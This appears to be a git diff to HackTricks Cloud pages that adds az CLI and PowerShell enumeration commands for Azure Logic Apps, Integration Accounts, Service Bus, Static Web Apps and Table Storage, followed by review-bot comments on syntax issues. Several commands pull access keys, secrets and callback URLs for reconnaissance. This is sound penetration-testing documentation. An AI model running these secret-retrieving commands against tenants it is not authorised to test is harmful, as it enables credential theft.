-ResourceGroupName -Name -# Get Logic App config -(Get-AzLogicApp -ResourceGroupName -Name ).Definition | ConvertTo-Json -# Get service ppal used -(Get-AzLogicApp -ResourceGroupName -Name ).Identity + +# Get details of a specific Logic App workflow run action +Get-AzLogicAppRunAction -ResourceGroupName "" -Name "" -RunName "" + +# Get the run history for a specific Logic App +Get-AzLogicAppRunHistory -ResourceGroupName "" -Name "" + +# Get details about triggers for a specific Logic App +Get-AzLogicAppTrigger -ResourceGroupName "" -Name "" + +# Get the callback URL for a specific trigger in a Logic App +Get-AzLogicAppTriggerCallbackUrl -ResourceGroupName "" -LName "" -TriggerName "" + +# Get the history of a specific trigger in a Logic App +Get-AzLogicAppTriggerHistory -ResourceGroupName "" -Name "" -TriggerName "" + ``` +{% endcode %} +{% endtab %} +{% endtabs %} -{{#endtab }} -{{#endtabs }} -{{#include ../../../banners/hacktricks-training.md}} +### Integration Accounts +**Integration Accounts**, are a feature of Azure Logic Apps. Integration Accounts are used to facilitate enterprise-level integrations by enabling advanced B2B capabilities, such as EDI, AS2, and XML schema management. Integration Accounts are a container in Azure that store the following artifacts used for Logic Apps: + +* Schemas: Manage XML schemas for validating and processing messages in your integration account. +* Maps: Configure XSLT-based transformations to convert data formats within your integration workflows. +* Assemblies: Manage integration account assemblies to streamline logic and data processing. +* Certificates: Handle certificates for encrypting and signing messages, ensuring secure communication. +* Partners: Manage trading partner information for B2B transactions, enabling seamless integrations. +* Agreements: Configure rules and settings for exchanging data with trading partners (e.g., EDI, AS2). 
+* Batch Configurations: Manage batch processing configurations to group and process messages efficiently. +* RosettaNet PIP: Configure RosettaNet Partner Interface Processes (PIPs) for standardizing B2B communication. + +#### Enumeration + +{% tabs %} +{% tab title="az cli" %} +{% code overflow="wrap" %} +```bash +# Integration account +az logic integration-account list --resource-group +az logic integration-account show --resource-group --name +az logic integration-account list-callback-url --resource-group --integration-account-name + +# Batch-configuration +az logic integration-account batch-configuration list \ + --resource-group \ + --integration-account-name + +az logic integration-account batch-configuration show \ + --resource-group \ + --integration-account-name \ + --batch-configuration-name + +# Map +az logic integration-account map list \ + --resource-group \ + --integration-account + +az logic integration-account map show \ + --resource-group \ + --integration-account \ + --map-name + +# Partner +az logic integration-account partner list \ + --resource-group \ + --integration-account + +az logic integration-account partner show \ + --resource-group \ + --integration-account \ + --name + +# Session +az logic integration-account session list \ + --resource-group \ + --integration-account + +az logic integration-account session show \ + --resource-group \ + --integration-account \ + --name + +# Assembly +# Session +az logic integration-account assembly list \ + --resource-group \ + --integration-account + +az logic integration-account assembly show \ + --resource-group \ + --integration-account \ + --assembly-artifact-name + + +``` +{% endcode %} +{% endtab %} + +{% tab title="Az PowerShell" %} +{% code overflow="wrap" %} +```powershell +Get-Command -Module Az.LogicApp + +# Retrieve details of an integration account +Get-AzIntegrationAccount -ResourceGroupName -Name + +# Retrieve the callback URL of an integration account 
+Get-AzIntegrationAccountCallbackUrl -ResourceGroupName -IntegrationAccountName + +# Retrieve details of a specific agreement in an integration account +Get-AzIntegrationAccountAgreement -ResourceGroupName -IntegrationAccountName -Name + +# Retrieve details of a specific assembly in an integration account +Get-AzIntegrationAccountAssembly -ResourceGroupName -IntegrationAccountName -Name + +# Retrieve details of a specific batch configuration in an integration account +Get-AzIntegrationAccountBatchConfiguration -ResourceGroupName -IntegrationAccountName -Name + +# Retrieve details of a specific certificate in an integration account +Get-AzIntegrationAccountCertificate -ResourceGroupName -IntegrationAccountName -Name + +# Retrieve details of a specific map in an integration account +Get-AzIntegrationAccountMap -ResourceGroupName -IntegrationAccountName -Name + +# Retrieve details of a specific partner in an integration account +Get-AzIntegrationAccountPartner -ResourceGroupName -IntegrationAccountName -Name + +# Retrieve details of a specific schema in an integration account +Get-AzIntegrationAccountSchema -ResourceGroupName -IntegrationAccountName -Name +``` +{% endcode %} +{% endtab %} +{% endtabs %} + + +## Privilege Escalation + +Same as logic apps privesc: + +{% content-ref url="../az-privilege-escalation/az-logic-apps-privesc.md" %} +[az-logic-apps-privesc.md](../az-privilege-escalation/az-logic-apps-privesc.md) +{% endcontent-ref %} + +## Post Exploitation + +{% content-ref url="../az-post-exploitation/az-logic-apps-post-exploitation.md" %} +[az-logic-apps-post-exploitation.md](../az-post-exploitation/az-logic-apps-post-exploitation.md) +{% endcontent-ref %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +
+{% endhint %} diff --git a/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md b/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md index 6e74cc9144..1626ccb39f 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md +++ b/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md @@ -51,6 +51,9 @@ sku, authrorization rule, ### Enumeration +{% tabs %} +{% tab title="az cli" %} +{% code overflow="wrap" %} ```bash # Queue Enumeration az servicebus queue list --resource-group --namespace-name 
@@ -78,6 +81,57 @@ az servicebus queue authorization-rule list --resource-group - az servicebus topic authorization-rule list --resource-group --namespace-name --topic-name az servicebus namespace authorization-rule keys list --resource-group --namespace-name --name ``` +{% endcode %} +{% endtab %} + +{% tab title="Az PowerShell" %} +{% code overflow="wrap" %} +```powershell +Get-Command -Module Az.ServiceBus + +# Retrieves details of a Service Bus namespace, including V2-specific features like additional metrics or configurations. +Get-AzServiceBusNamespaceV2 -ResourceGroupName -Name + +# Retrieves the authorization rules for a Service Bus namespace, queue, or topic. +Get-AzServiceBusAuthorizationRule -ResourceGroupName -NamespaceName + +# Retrieves the Geo-Disaster Recovery configuration for a Service Bus namespace, if it is enabled. +Get-AzServiceBusGeoDRConfiguration -ResourceGroupName -NamespaceName + +# Retrieves the shared access keys for a specified authorization rule in a Service Bus namespace. +Get-AzServiceBusKey -ResourceGroupName -NamespaceName -Name + +# Retrieves the migration state and details for a Service Bus namespace, if a migration is in progress. +Get-AzServiceBusMigration -ResourceGroupName -NamespaceName + +# Retrieves properties and details about a Service Bus namespace. +Get-AzServiceBusNamespace -ResourceGroupName -Name + +# Retrieves the network rule set for a Service Bus namespace, such as IP restrictions or virtual network access rules. +Get-AzServiceBusNetworkRuleSet -ResourceGroupName -NamespaceName + +# Retrieves private endpoint connections for a Service Bus namespace. +Get-AzServiceBusPrivateEndpointConnection -ResourceGroupName -NamespaceName + +# Retrieves private link resources associated with a Service Bus namespace. +Get-AzServiceBusPrivateLink -ResourceGroupName -NamespaceName + +# Retrieves details of a specified queue in a Service Bus namespace. 
+Get-AzServiceBusQueue -ResourceGroupName -NamespaceName -Name + +# Retrieves rules (filters and actions) for a subscription under a Service Bus topic. +Get-AzServiceBusRule -ResourceGroupName -NamespaceName -TopicName -SubscriptionName + +# Retrieves details of subscriptions for a specified Service Bus topic. +Get-AzServiceBusSubscription -ResourceGroupName -NamespaceName -TopicName + +# Retrieves details of a specified topic in a Service Bus namespace. +Get-AzServiceBusTopic -ResourceGroupName -NamespaceName +``` +{% endcode %} +{% endtab %} +{% endtabs %} + ### Privilege Escalation diff --git a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md index 1576b65e97..60b6d6e324 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md +++ b/src/pentesting-cloud/azure-security/az-services/az-static-web-apps.md @@ -84,6 +84,9 @@ For more info you can find an Azure guide use a vault secret in a static app in ## Enumeration +{% tabs %} +{% tab title="az cli" %} +{% code overflow="wrap" %} ```bash # List Static Webapps az staticwebapp list --output table 
@@ -115,6 +118,58 @@ az rest --method POST \ # Check connected backends az staticwebapp backends show --name --resource-group ``` +{% endcode %} +{% endtab %} + +{% tab title="Az PowerShell" %} +{% code overflow="wrap" %} +```powershell +Get-Command -Module Az.Websites + +# Retrieves details of a specific Static Web App in the specified resource group. +Get-AzStaticWebApp -ResourceGroupName -Name + +# Retrieves the build details for a specific Static Web App. +Get-AzStaticWebAppBuild -ResourceGroupName -Name + +# Retrieves the application settings for a specific build environment in a Static Web App. +Get-AzStaticWebAppBuildAppSetting -ResourceGroupName -Name -EnvironmentName + +# Retrieves functions for a specific build environment in a Static Web App. +Get-AzStaticWebAppBuildFunction -ResourceGroupName -Name -EnvironmentName + +# Retrieves function app settings for a specific build environment in a Static Web App. +Get-AzStaticWebAppBuildFunctionAppSetting -ResourceGroupName -Name -EnvironmentName + +# Retrieves the configured roles for a Static Web App. +Get-AzStaticWebAppConfiguredRole -ResourceGroupName -Name + +# Retrieves the custom domains configured for a Static Web App. +Get-AzStaticWebAppCustomDomain -ResourceGroupName -Name + +# Retrieves details of the functions associated with a Static Web App. +Get-AzStaticWebAppFunction -ResourceGroupName -Name + +# Retrieves the app settings for the function app associated with a Static Web App. +Get-AzStaticWebAppFunctionAppSetting -ResourceGroupName -Name + +# Retrieves the secrets for a Static Web App. +Get-AzStaticWebAppSecret -ResourceGroupName -Name + +# Retrieves general app settings for a Static Web App. +Get-AzStaticWebAppSetting -ResourceGroupName -Name + +# Retrieves user details for a Static Web App with a specified authentication provider. +Get-AzStaticWebAppUser -ResourceGroupName -Name -AuthProvider + +# Retrieves user-provided function apps associated with a Static Web App. 
+Get-AzStaticWebAppUserProvidedFunctionApp -ResourceGroupName -Name + +``` +{% endcode %} +{% endtab %} +{% endtabs %} + ## Examples to generate Web Apps diff --git a/src/pentesting-cloud/azure-security/az-services/az-table-storage.md b/src/pentesting-cloud/azure-security/az-services/az-table-storage.md index 626250f82f..9e28109eb6 100644 --- a/src/pentesting-cloud/azure-security/az-services/az-table-storage.md +++ b/src/pentesting-cloud/azure-security/az-services/az-table-storage.md @@ -72,6 +72,8 @@ Get-AzStorageAccount # List tables Get-AzStorageTable -Context (Get-AzStorageAccount -Name -ResourceGroupName ).Context + +Get-AzStorageTableStoredAccessPolicy -Table -Context (Get-AzStorageAccount -Name ).Context ``` {{#endtab}}
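Review bot: In the az cli tab of the Logic Apps Enumeration hunk, the first `az rest` call puts `&$expand=connections.json,parameters.json` inside a double-quoted `--uri`, so bash expands `$expand` as an unset variable and the request is sent with `&=connections.json,parameters.json`; single-quote the URI or write `\$expand`. Further points in the same hunk: the workflow "Az PowerShell" tab is fenced as `bash` while the Integration Accounts tab uses `powershell`; `Get-AzLogicAppTriggerCallbackUrl` is given `-LName` where the neighbouring cmdlets take `-Name`; the `az rest` call to `examplelogicapp1994.scm.azurewebsites.net/api/functions/admin/download` has no comment and a hard-coded host where every other command uses a placeholder; and the assembly commands sit under `# Assembly` followed by a leftover `# Session`.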
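Review bot: In the Az PowerShell tab added to az-servicebus-enum.md, `Get-AzServiceBusTopic -ResourceGroupName -NamespaceName` is commented as retrieving "a specified topic" but takes no `-Name`, unlike the `Get-AzServiceBusQueue` line above it; add the `-Name` argument or reword the comment to say it lists the topics in the namespace. The comment on `Get-AzServiceBusNamespaceV2` ("V2-specific features like additional metrics or configurations") does not tell a reader when to prefer it over `Get-AzServiceBusNamespace`, which is listed a few lines later; state the concrete difference or keep only one of the two.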
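Review bot: The `{% tabs %}`, `{% tab title="..." %}`, `{% code overflow="wrap" %}` and `{% endtabs %}` wrappers added in the Logic Apps, Service Bus and Static Web Apps hunks use a different macro syntax from the rest of the tree: the Logic Apps hunk removes `{{#tabs }}` / `{{#tab name="az cli" }}` to introduce them, and the az-table-storage.md context in this same patch still closes its tab with `{{#endtab}}`. The Logic Apps hunk likewise swaps `{{#include ../../../banners/hacktricks-training.md}}` for an inline `{% hint style="success" %}` banner and adds `{% content-ref %}` blocks. Unless the build renders both syntaxes, keep the `{{#tabs }}` / `{{#tab name=... }}` / `{{#include ...}}` forms so these pages do not ship with literal macro text.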
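Review bot: The `Get-AzStorageTableStoredAccessPolicy` line added to az-table-storage.md has no comment, while the block's other commands are labelled (`# List tables`), and its nested `Get-AzStorageAccount -Name` call drops the `-ResourceGroupName` argument that the `Get-AzStorageTable` line directly above passes. Add a one-line comment saying what the stored access policy output is used for, and make the two `Get-AzStorageAccount` sub-expressions consistent.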